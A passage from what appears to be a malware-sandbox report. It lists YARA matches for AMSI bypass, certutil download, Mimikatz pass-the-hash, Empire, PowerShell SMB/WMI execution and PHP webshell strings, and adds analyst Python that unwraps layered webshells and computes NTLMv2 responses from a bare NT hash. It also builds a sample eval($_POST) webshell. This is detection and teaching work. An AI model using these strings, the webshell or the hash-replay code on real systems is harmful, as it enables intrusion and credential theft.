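    """Map each rule prefix to the prefix its sample bytes really encode to."""
    return {p: base64.b64encode(src).decode("ascii")[: len(p)]
            for p, (src, _) in PREFIX_SOURCES.items()}


def decode_unicode_literal(blob: str) -> str:
    """Undo [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(blob)).

    Rule strings are sometimes cut before the '=' padding (the Inveigh $s6
    string above), so the blob is re-padded to a multiple of four first.
    """
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


_CALL = re.compile(r"::FromBase64String\(\s*[\"']([A-Za-z0-9+/=]{3,})")


def classify_fromb64(script: str) -> list[tuple[int, str, str]]:
    """(offset, first six base64 chars, label) per FromBase64String literal,
    mirroring the report's offset:string columns. Unknown prefixes come back
    as 'unclassified' so an analyst knows to decode them by hand."""
    hits = []
    for m in _CALL.finditer(script):
        literal = m.group(1)
        label = "unclassified"
        for prefix, (_, desc) in PREFIX_SOURCES.items():
            if literal.startswith(prefix):
                label = desc
                break
        hits.append((m.start(), literal[:6], label))
    return hits


# Constructed sample script (blobs truncated), not taken from the dump.
SAMPLE_SCRIPT = (
    "$g = [Convert]::FromBase64String('H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMV')\n"
    "$pe = [Convert]::FromBase64String(\"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA\")\n"
    "if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString("
    "[Convert]::FromBase64String('QQBNAEQANgA0AA=='))))) { 'x64' }\n"
)

if __name__ == "__main__":
    for off, head, label in classify_fromb64(SAMPLE_SCRIPT):
        print(f"0x{off:x}: {head}... {label}")
    print(decode_unicode_literal("UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA="))
```

The prefixes are only as good as the first three bytes: a payload that is XORed, reversed or prefixed with a junk byte before base64 encoding produces none of them, which is why the PowerUp/Persistence literals (plain UTF-16LE strings) still decode cleanly while a custom loader may not.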
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x6df6:$s1: <hta:application windowstate="minimize"/>
- 0x6f62:$s1: <hta:application windowstate="minimize"/>
- 0x6e24:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a suspicious VBS script that drops an executable | Florian Roth | - 0x3369:$s5: TVqQAAMAAAAEAA
- 0x4a8a:$s5: TVqQAAMAAAAEAA
- 0x965a:$s5: TVqQAAMAAAAEAA
- 0x11cf2:$s5: TVqQAAMAAAAEAA
- 0x12208:$s5: TVqQAAMAAAAEAA
- 0xdbad:$a1: = CreateObject("Wscript.Shell")
- 0xe704:$a1: = CreateObject("Wscript.Shell")
- 0x14163:$a1: = CreateObject("Wscript.Shell")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0xbd36:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0xbe75:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0xbea0:$x2: script:https://www.dropbox.com
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0xbfa7:$s1: mshtml,RunHTMLApplication
- 0xbfc5:$s2: new ActiveXObject("WScript.Shell").Run(
- 0xbff1:$s3: /c start mshta j
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0xc0f8:$s1: w = new ActiveXObject(
- 0xc113:$s2: w.Run(r);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Certutil_Decode_OR_Download | Certutil Decode | Florian Roth | - 0xc1f4:$a1: certutil -decode
- 0xc20a:$a2: certutil -decode
- 0xc221:$a3: certutil.exe -decode
- 0xc23b:$a4: certutil.exe -decode
- 0xc256:$a5: certutil -urlcache -split -f http
- 0xc27c:$a6: certutil.exe -urlcache -split -f http
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | VBS_Obfuscated_Mal_Feb18_1 | Detects malicious obfuscated VBS observed in February 2018 | Florian Roth | - 0xc77c:$x1: A( Array( (1* 2^1 )+
- 0xc795:$x2: .addcode(A( Array(
- 0xc7ac:$x3: false:AA.send:Execute(AA.responsetext):end
- 0xc7db:$x4: & A( Array( (1* 2^1 )+
- 0xc7f7:$s1: .SYSTEMTYPE:NEXT:IF (UCASE(
- 0xc817:$s2: A = STR:next:end function
- 0xc835:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mimikatz_Memory_Rule_1 | Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures) | Florian Roth | - 0x1200d:$s11: sekurlsa::pth
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HKTL_PowerSploit | Detects default strings used by PowerSploit to establish persistence | Markus Neis | - 0x11f0:$ps: function
- 0x35b8:$ps: function
- 0x524b:$ps: Function
- 0xc828:$ps: function
- 0xdd92:$ps: Function
- 0xdf64:$ps: Function
- 0x116ae:$ps: FUNCTION
- 0x14595:$ps: Function
- 0x145db:$ps: Function
- 0x146e2:$ps: Function
- 0x161b2:$ps: Function
- 0x16fa9:$ps: function
- 0x17896:$ps: function
- 0x1f850:$ps: Function
- 0x23a2a:$ps: function
- 0x2507c:$ps: function
- 0x2b896:$ps: function
- 0x2b8c6:$ps: function
- 0x2e5c2:$ps: Function
- 0x2e5ef:$ps: Function
- 0x30953:$ps: Function
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_BypassUAC | Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1 | Florian Roth | - 0x110be:$s1: $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x1110c:$s2: $proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru
- 0x11150:$s3: $Payload = Invoke-PatchDll -DllBytes $Payload -FindString "ExitThread" -ReplaceString "ExitProcess"
- 0x111b8:$s4: $temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Mimikatz | Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x11ce4:$s1: $PEBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc
- 0x11d68:$s2: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
- 0x11dd9:$s3: Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Write_HijackDll | Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1 | Florian Roth | - 0x12193:$s1: $DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString "debug.bat" -ReplaceString $BatchPath
- 0x121f9:$s2: $DllBytes32 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw
- 0x1227d:$s3: [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0xf0be:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0xf0e5:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0xf128:$s3: MimiPenguin Results:
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_generic | php webshell having some kind of input and some kind of payload. restricted to small files or big ones including suspicious strings | Arnim Rupp | - 0x2c71f:$wfp_tiny2: addslashes
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
- 0x240f0:$php_short: <?
- 0x245bd:$php_short: <?
- 0x24814:$php_short: <?
- 0x28ecf:$php_short: <?
- 0x28f4e:$php_short: <?
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_generic_callback | php webshell having some kind of input and using a callback to execute the payload. restricted to small files or would give lots of false positives | Arnim Rupp | - 0x1fabb:$inp1: php://input
- 0x20a8e:$inp1: php://input
- 0x20afd:$inp1: php://input
- 0x20b2c:$inp1: php://input
- 0x203d0:$inp2: _GET[
- 0x203ec:$inp2: _GET[
- 0x2040d:$inp2: _GET[
- 0x23d8d:$inp2: _GET[
- 0x23dcd:$inp2: _GET[
- 0x255da:$inp2: _GET[
- 0x29750:$inp2: _GET[
- 0x2976a:$inp2: _GET[
- 0x2977f:$inp2: _GET[
- 0x2e97f:$inp2: _GET[
- 0x2f603:$inp2: _GET[
- 0x2fcfb:$inp2: _GET[
- 0x2fd0e:$inp2: _GET[
- 0x2fd19:$inp2: _GET[
- 0x2fd81:$inp2: _GET[
- 0x3dc76:$inp2: _GET[
- 0x3dd76:$inp2: _GET[
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_obfuscated_encoding | PHP webshell obfuscated by encoding | Arnim Rupp | - 0x2efcd:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x57a8e:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x57ce7:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x2efcd:$enc_eval2: \x65\x76\x61\x6C\x28
- 0x57a8e:$enc_eval2: \x65\x76\x61\x6C\x28
- 0x57ce7:$enc_eval2: \x65\x76\x61\x6C\x28
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0x1d900:$payload2: eval(gzinflate(base64_decode(
- 0x240f3:$payload2: eval(gzinflate(base64_decode(
- 0x24f45:$payload2: eval(gzinflate(base64_decode(
- 0x312d2:$payload2: eval(gzinflate(base64_decode(
- 0x3268d:$payload2: eval(gzinflate(base64_decode(
- 0x3e9ff:$payload2: eval(gzinflate(base64_decode(
- 0x3eda2:$payload2: eval("?>".gzinflate(base64_decode(
- 0x40bb1:$payload2: eval(gzinflate(base64_decode(
- 0x42319:$payload2: eval(gzinflate(base64_decode(
- 0x21011:$payload4: eval(gzuncompress(base64_decode
- 0x2f227:$payload4: eval(gzuncompress(gzuncompress
- 0x34ff1:$payload7: eval(base64_decode(
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_dynamic_big | PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k | Arnim Rupp | - 0x1b29f:$new_php2: <?php
- 0x1c108:$new_php2: <?php
- 0x1d62c:$new_php2: <?php
- 0x1dd6e:$new_php2: <?php
- 0x1ddc9:$new_php2: <?php
- 0x1ed4e:$new_php2: <?php
- 0x20546:$new_php2: <?php
- 0x20d24:$new_php2: <?php
- 0x2100b:$new_php2: <?php
- 0x22817:$new_php2: <?php
- 0x23561:$new_php2: <?php
- 0x24814:$new_php2: <?php
- 0x2e974:$new_php2: <?php
- 0x2fab7:$new_php2: <?php
- 0x3040a:$new_php2: <?php
- 0x30522:$new_php2: <?php
- 0x307b3:$new_php2: <?php
- 0x34157:$new_php2: <?php
- 0x3467d:$new_php2: <?php
- 0x40221:$new_php2: <?php
- 0x43046:$new_php2: <?php
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_by_string_known_webshell | Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are caught by other rules in here but maybe these catch different versions. | Arnim Rupp | - 0x3ed93:$pbs5: b374k
- 0x2100b:$front1: <?php eval(
- 0x2fab7:$front1: <?php eval(
- 0x30522:$front1: <?php eval(
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
- 0x240f0:$php_short: <?
- 0x245bd:$php_short: <?
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_by_string_obfuscation | PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming | Arnim Rupp | - 0x23623:$opbs18: e'.'v'.'a'.'l
- 0x57772:$opbs25: cr"."eat
- 0x57780:$opbs26: un"."ct
- 0x58af8:$opbs48: se'.(32*2)
- 0x30636:$opbs55: =chr(99).chr(104).chr(114);$_
- 0x30538:$opbs70: riny($_CBFG[
- 0x30528:$opbs73: eval(str_rot13(
- 0x2efcd:$opbs77: \x65\x76\x61\x6C\x28
- 0x57a8e:$opbs77: \x65\x76\x61\x6C\x28
- 0x57ce7:$opbs77: \x65\x76\x61\x6C\x28
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
|
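The webshell_php_gzinflated strings above (eval(gzinflate(base64_decode(, eval(gzuncompress(base64_decode, eval(base64_decode() and the webshell_php_by_string_obfuscation strings (eval(str_rot13(, riny($_CBFG[) describe the same trick at different depths: the real shell is wrapped in one or more decode-then-eval layers, and str_rot13 can hide either the payload or the function names themselves (riny($_CBFG[ is eval($_POST[ after rot13). The Python below is an added example, not code from the report or from Arnim Rupp's rules; it peels such layers by emulating the PHP functions with zlib (gzinflate is raw DEFLATE, gzuncompress is zlib-wrapped DEFLATE, gzdecode is gzip), applying the call chain innermost-first as PHP would, and stopping at a layer cap so a malformed blob cannot loop. The sample webshell is constructed in the block; names are hypothetical.

```python
"""Added example: unwrap eval(decoder(decoder('...'))) PHP webshell layers.
Not code from the report or from the YARA rules it illustrates."""
from __future__ import annotations

import base64
import codecs
import re
import zlib

# eval( [ "?>" . ] f1( f2( '<literal>' ) ) );  -> group 1 = call chain, group 2 = literal
_WRAPPED = re.compile(
    r"eval\s*\(\s*(?:\"\?>\"\s*\.\s*)?((?:[a-z0-9_]+\s*\(\s*)+)['\"]([^'\"]+)['\"]\s*\)+\s*;?",
    re.IGNORECASE,
)

# PHP decoder -> Python emulation operating on bytes.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, no header
    "gzuncompress": lambda b: zlib.decompress(b),     # zlib header + DEFLATE
    "gzdecode": lambda b: zlib.decompress(b, 31),     # gzip header + DEFLATE
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}


def unwrap_eval_layers(php: str, max_layers: int = 16) -> tuple[str, list[str]]:
    """Return (innermost PHP source, decoders applied in execution order).

    Stops when the text no longer carries an eval(...) wrapper, when a decoder
    is not emulated (the partially unwrapped text is returned so nothing is
    lost), or after max_layers, so a self-referential blob cannot spin forever.
    """
    applied: list[str] = []
    for _ in range(max_layers):
        m = _WRAPPED.search(php)
        if not m:
            break
        chain = re.findall(r"[a-z0-9_]+", m.group(1), re.IGNORECASE)
        data = m.group(2).encode("latin-1")
        # PHP evaluates the innermost call first: eval(A(B('x'))) runs B, then A.
        for fn in reversed(chain):
            fn = fn.lower()
            if fn not in DECODERS:
                return php, applied
            data = DECODERS[fn](data)
            applied.append(fn)
        php = data.decode("latin-1")
    return php, applied


# The literal strings quoted in the report for these two rules.
RULE_STRINGS = [
    "eval(gzinflate(base64_decode(",
    'eval("?>".gzinflate(base64_decode(',
    "eval(gzuncompress(base64_decode",
    "eval(gzuncompress(gzuncompress",
    "eval(base64_decode(",
    "eval(str_rot13(",
    "riny($_CBFG[",
]


def tell_tales(php: str) -> list[str]:
    """Which of the rule strings appear verbatim in php, in rule order."""
    return [s for s in RULE_STRINGS if s in php]


def _raw_deflate(data: bytes) -> bytes:
    """What PHP's gzdeflate() emits: DEFLATE without zlib or gzip framing."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


# Constructed three-layer sample: outer gzinflate, middle gzuncompress+rot13,
# innermost a one-line POST shell. Not taken from the memory dump.
INNER_SHELL = '<?php eval($_POST["cmd"]); ?>'
_MIDDLE = "eval(str_rot13(gzuncompress(base64_decode('%s'))));" % base64.b64encode(
    zlib.compress(codecs.encode(INNER_SHELL, "rot_13").encode("latin-1"))).decode()
SAMPLE_WEBSHELL = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(
    _raw_deflate(_MIDDLE.encode("latin-1"))).decode()

if __name__ == "__main__":
    source, chain = unwrap_eval_layers(SAMPLE_WEBSHELL)
    print("indicators:", tell_tales(SAMPLE_WEBSHELL))
    print("layers:", " -> ".join(chain))
    print("payload:", source)
```

Two caveats when using this on real files: the regex only handles a quoted literal as the innermost argument, so a shell that assembles the blob from concatenated variables first needs that concatenation resolved; and a decoder name that is itself built at runtime (the $a($code) pattern the webshell_php_dynamic_big rule targets) will not be in the chain at all, which is exactly why that rule exists alongside these.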
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_strings_susp | typical webshell strings, suspicious | Arnim Rupp | - 0x3eda2:$sstring1: eval("?>"
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
- 0x240f0:$php_short: <?
- 0x245bd:$php_short: <?
- 0x24814:$php_short: <?
- 0x28ecf:$php_short: <?
- 0x28f4e:$php_short: <?
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | CobaltStrike_Sleep_Decoder_Indicator | Detects CobaltStrike sleep_mask decoder | yara@s3c.za.net | - 0x230:$sleep_decoder: 8B 07 8B 57 04 83 C7 08 85 C0 75 2C
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | CobaltStrike_Unmodifed_Beacon | Detects unmodified CobaltStrike beacon DLL | yara@s3c.za.net | - 0x40a:$loader_export: ReflectiveLoader
- 0xaac5:$loader_export: ReflectiveLoader
- 0xab88:$loader_export: ReflectiveLoader
- 0xabb6:$loader_export: ReflectiveLoader
- 0xabdc:$loader_export: ReflectiveLoader
- 0xac06:$loader_export: ReflectiveLoader
- 0xac32:$loader_export: ReflectiveLoader
- 0xadab:$loader_export: ReflectiveLoader
- 0xae14:$loader_export: ReflectiveLoader
- 0xb1fd:$loader_export: ReflectiveLoader
- 0xb279:$loader_export: ReflectiveLoader
- 0xecda:$loader_export: ReflectiveLoader
- 0xed12:$loader_export: ReflectiveLoader
- 0x427:$exportname: beacon.dll
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Metasploit_Loader_RSMudge | Detects a Metasploit Loader by RSMudge - file loader.exe | Florian Roth | - 0xcc0c:$s1: Could not resolve target
- 0xcc29:$s2: Could not connect to target
- 0xcc49:$s3: %s [host] [port]
- 0xcc5e:$s4: ws2_32.dll is out of date.
- 0xcc7d:$s5: read a strange or incomplete length value
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x1b1b:$s1: \umeterpreter\u >
- 0x1b31:$s3: ^meterpreter >
- 0x1b45:$s11: \umsf\u>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x1e38:$x1: resources/covertvpn-injector.exe
- 0x1e5e:$s10: resources/browserpivot.x64.dll
- 0x1e82:$s17: resources/msfrpcd_new.bat
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x965a:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0x96d1:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | NTLM_Dump_Output | NTLM Hash Dump output file - John/LC format | Florian Roth | - 0x1acae:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE:
- 0x1acd8:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_SMBExec | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x9a2e:$x1: Invoke-SMBExec -Target
- 0x9a49:$x2: $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
- 0x9ab6:$s1: Write-Output "Command executed with service $SMB_service on $Target"
- 0x9aff:$s2: $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- 0x9b62:$s3: $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_WMIExec_Gen_1 | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x9d34:$x1: Invoke-WMIExec
- 0x9d48:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))
- 0x9db8:$s1: Import-Module $PWD\Invoke-TheHash.ps1
- 0x9de2:$s2: Import-Module $PWD\Invoke-SMBClient.ps1
- 0x9e0e:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList
- 0x9e62:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_SMBExec_Invoke_WMIExec_1 | Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0xa065:$s1: $process_ID = $process_ID -replace "-00-00",""
- 0xa098:$s2: Write-Output "$Target did not respond"
- 0xa0c3:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_WMIExec_Gen | Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0xa321:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
- 0xa366:$s2: $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- 0xa3d1:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
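The NTLM_Dump_Output row matches the pwdump/John line format (`rid:lmhash:nthash`, where aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, i.e. no LM hash stored), and the Invoke_WMIExec_Gen strings are the NTLMv2 key derivation that Invoke-TheHash performs with a dumped NT hash in place of a password. The Python below is an added example, not code from the sandbox report or from Invoke-TheHash: it parses a constructed sample dump, derives the NTLMv2 key and response the same way (HMAC-MD5 keyed with the NT hash; the `$NTLMv2_hash = $HMAC_MD5.ComputeHash(...)` line above is this step), and checks the result against the public MS-NLMP 4.2.4 test vector (user "User", domain "Domain", server "Server", password "Password", fixed server and client challenges), which is where the hash a4f49c40... and the challenge values are taken from. A real client draws the 8-byte client challenge at random, as the Get-Random line above shows; it is fixed here so the output is reproducible. All function and variable names are my own.

```python
import hashlib
import hmac
import struct

EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample dump (not from the report) in pwdump/John format,
# user:rid:lmhash:nthash:::  The NT hash on the last line is the MS-NLMP
# test-vector NTOWFv1 of the password "Password".
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
User:1001:aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852:::
"""


def parse_pwdump(text: str) -> list:
    """Parse pwdump lines and flag what a triage pass cares about."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid = fields[0], int(fields[1])
        lm, nt = fields[2].lower(), fields[3].lower()
        entries.append({
            "user": user, "rid": rid, "lm": lm, "nt": nt,
            "builtin_admin": rid == 500,           # RID 500 is the built-in Administrator
            "lm_stored": lm != EMPTY_LM_HASH,       # an LM hash should not exist on modern hosts
            "blank_password": nt == EMPTY_NT_HASH,
        })
    return entries


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key (NTOWFv2): HMAC-MD5 keyed with the NT hash over
    UTF-16LE(UPPER(user) + domain). Only the hash is needed, never the
    password, which is what makes a dumped NT hash replayable."""
    data = (user.upper() + domain).encode("utf-16le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def target_info(domain: str, server: str) -> bytes:
    """Minimal AV_PAIR list: MsvAvNbDomainName (2), MsvAvNbComputerName (1), MsvAvEOL (0)."""
    def pair(av_id: int, value: str) -> bytes:
        v = value.encode("utf-16le")
        return struct.pack("<HH", av_id, len(v)) + v
    return pair(2, domain) + pair(1, server) + struct.pack("<HH", 0, 0)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int, av_pairs: bytes):
    """Return (NTLMv2_RESPONSE, SessionBaseKey) as laid out in MS-NLMP 3.3.2."""
    temp = (b"\x01\x01" + b"\x00" * 6           # RespType, HiRespType, Reserved1, Reserved2
            + struct.pack("<Q", timestamp)       # FILETIME
            + client_challenge                   # 8 bytes, random in a real client
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof + temp, session_base_key


if __name__ == "__main__":
    entries = parse_pwdump(SAMPLE_DUMP)
    for e in entries:
        print(e)
    victim = entries[2]
    resp, sbk = ntlmv2_response(bytes.fromhex(victim["nt"]), victim["user"], "Domain",
                                bytes.fromhex("0123456789abcdef"), b"\xaa" * 8, 0,
                                target_info("Domain", "Server"))
    print("NTProofStr:", resp[:16].hex(), "SessionBaseKey:", sbk.hex())
```

The triage flags are what an analyst reads off a dump such as the matched `500:aad3b435b51404eeaad3b435b51404ee:` line: a built-in Administrator with no LM hash is normal, a built-in Administrator with the empty NT hash is not.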
